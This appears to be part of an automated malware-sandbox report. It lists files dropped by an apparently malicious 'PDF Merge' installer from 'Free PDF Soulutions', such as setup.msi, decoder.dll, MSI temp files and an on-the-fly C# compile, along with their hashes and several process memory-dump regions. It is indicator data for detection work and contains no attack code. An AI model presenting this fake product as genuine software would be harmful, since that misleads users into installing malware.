ad8ef8255e2c885217986e0785c4fdfb0f84765e

SHA256
7c38e4644c3d457703b99ce6f7d71a6d8b3c499a4781b345cf2c9bc1411aaa70

SHA512
107558c9efdda48d1da3e7b846a175a12ebf8f2608ecf35338fd92bd99b36ab5b46ec252543653c59ebd26f77ec80d0b0161fa4ce6f0934dcfbd299caaf5d2be

Download Submit
C:\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\FFA03B0\setup.msi

Filesize
841KB

MD5
644dc18c44254707dd745ac018b9f6ae

SHA1
4a929d3d872eed25c63fdd0c818d71438f5d6958

SHA256
a01f73799b6c72c39c784b97bc595bbd4719c2479040648e79cda2a45b10b07a

SHA512
c4eee994ddc11ee1a7a359bb9b78e180496cddc61595ebab263d3d377bf6fd1aa792fb98bc46b88d8a8d2cf1a380117493b7c47ccccd73fb0c8f064b362caf93

Download Submit
C:\Windows\Installer\MSI2819.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
C:\Windows\Installer\MSI30A6.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
C:\Windows\Installer\MSI31A1.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
C:\Windows\Installer\MSI34A1.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
C:\Windows\Installer\MSI3687.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hh14rmam\CSCB9CD6CC1A8D04C4385BBA21B3B6785C3.TMP

Filesize
652B

MD5
64a0ed485406699c3564e085cac8c41b

SHA1
764438a66baec8ce5717e7b61face9e5407f2e6d

SHA256
04447147c93a09b5b9d5ae12d44f3b49b1c3be7faf86bbea0f69b09fe66644ab

SHA512
dd5e73da31c4ed1d830ad5c18b0b7a765a2a4d93889d398aa9e5406868541d4cb137e14f1947c63e5fd9b3dc4dd7bf848768711133e6b4444c0142f23990e939

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hh14rmam\hh14rmam.0.cs

Filesize
236B

MD5
2f9b4948ac0b26204994e246094a9f5d

SHA1
9870e53ad61eba593a2074d2a30202f7e3df09f7

SHA256
def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776

SHA512
ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hh14rmam\hh14rmam.cmdline

Filesize
369B

MD5
58fed718f90c4560c7ae6cab98ac8ba4

SHA1
0b7b481529e1191af095408f2337a27d85f971c7

SHA256
e32c25affce0bb6d8845dd31ab4b9184ab3420cfdb829ee3f4e02265cfb390d8

SHA512
ddde3e17e534816744c8283f548c9d13cd53c1eccf91cd7429ac106e6ed9f805d178e8b736d621f184b193feab88f10060fff308b3008512c5192e532b501b63

Download Submit
\Users\Admin\AppData\Local\Temp\MSIF0BE.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
\Users\Admin\AppData\Local\Temp\MSIFB1F.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
\Users\Admin\AppData\Local\Temp\MSIFD14.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
\Users\Admin\AppData\Local\Temp\MSIFE2E.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\decoder.dll

Filesize
120KB

MD5
0dbb6ca9af2cb9b585f814a3ca4b49ad

SHA1
25692b7117913b96631c3f9a2fe19833c7bbe63c

SHA256
9f3a6b5eb8785436618c153cdce216e2bd80c54f23c45b2a7e48db2c0b01c685

SHA512
6c399d0fd96558e6e7be61bd8c58e32771a8f85db947bd9a31cada9c7f8f0a552f24d2c78c282df46ded4fc1189cee61e6a54f54a8245b1f7f7a104821c00680

Download Submit
\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\decoder.dll

Filesize
120KB

MD5
0dbb6ca9af2cb9b585f814a3ca4b49ad

SHA1
25692b7117913b96631c3f9a2fe19833c7bbe63c

SHA256
9f3a6b5eb8785436618c153cdce216e2bd80c54f23c45b2a7e48db2c0b01c685

SHA512
6c399d0fd96558e6e7be61bd8c58e32771a8f85db947bd9a31cada9c7f8f0a552f24d2c78c282df46ded4fc1189cee61e6a54f54a8245b1f7f7a104821c00680

Download Submit
\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\decoder.dll

Filesize
120KB

MD5
0dbb6ca9af2cb9b585f814a3ca4b49ad

SHA1
25692b7117913b96631c3f9a2fe19833c7bbe63c

SHA256
9f3a6b5eb8785436618c153cdce216e2bd80c54f23c45b2a7e48db2c0b01c685

SHA512
6c399d0fd96558e6e7be61bd8c58e32771a8f85db947bd9a31cada9c7f8f0a552f24d2c78c282df46ded4fc1189cee61e6a54f54a8245b1f7f7a104821c00680

Download Submit
\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\decoder.dll

Filesize
120KB

MD5
0dbb6ca9af2cb9b585f814a3ca4b49ad

SHA1
25692b7117913b96631c3f9a2fe19833c7bbe63c

SHA256
9f3a6b5eb8785436618c153cdce216e2bd80c54f23c45b2a7e48db2c0b01c685

SHA512
6c399d0fd96558e6e7be61bd8c58e32771a8f85db947bd9a31cada9c7f8f0a552f24d2c78c282df46ded4fc1189cee61e6a54f54a8245b1f7f7a104821c00680

Download Submit
\Windows\Installer\MSI2819.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
\Windows\Installer\MSI30A6.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
\Windows\Installer\MSI31A1.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
\Windows\Installer\MSI34A1.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
\Windows\Installer\MSI3687.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
memory/2340-154-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-164-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-158-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-156-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-153-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-151-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-150-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-148-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-144-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-142-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-140-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-165-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-167-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-166-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-168-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-169-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-170-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-171-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-172-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-173-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-174-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-175-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-177-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-178-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-176-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-179-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-180-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-181-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-182-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-161-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-184-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-185-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-187-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-162-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-188-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-189-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-190-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-159-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-163-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-160-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-157-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-155-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-124-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-152-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-149-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-147-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-146-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-145-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-143-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-141-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-139-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-130-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-138-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-137-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-135-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-136-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-134-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-133-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-132-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-129-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-128-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-127-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-125-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2340-126-0x0000000077BA0000-0x0000000077D2E000-memory.dmp

Filesize
1.6MB

Download
memory/2904-120-0x000001FFB3F50000-0x000001FFB43F8000-memory.dmp

Filesize
4.7MB

Download
memory/4916-455-0x0000024F9ABA0000-0x0000024F9AC16000-memory.dmp

Filesize
472KB

Download
memory/4916-454-0x0000024F80800000-0x0000024F80822000-memory.dmp

Filesize
136KB

Download
memory/4916-463-0x0000024F80840000-0x0000024F80848000-memory.dmp

Filesize
32KB

Download
memory/4916-464-0x0000024F9AB60000-0x0000024F9AB8A000-memory.dmp

Filesize
168KB

Download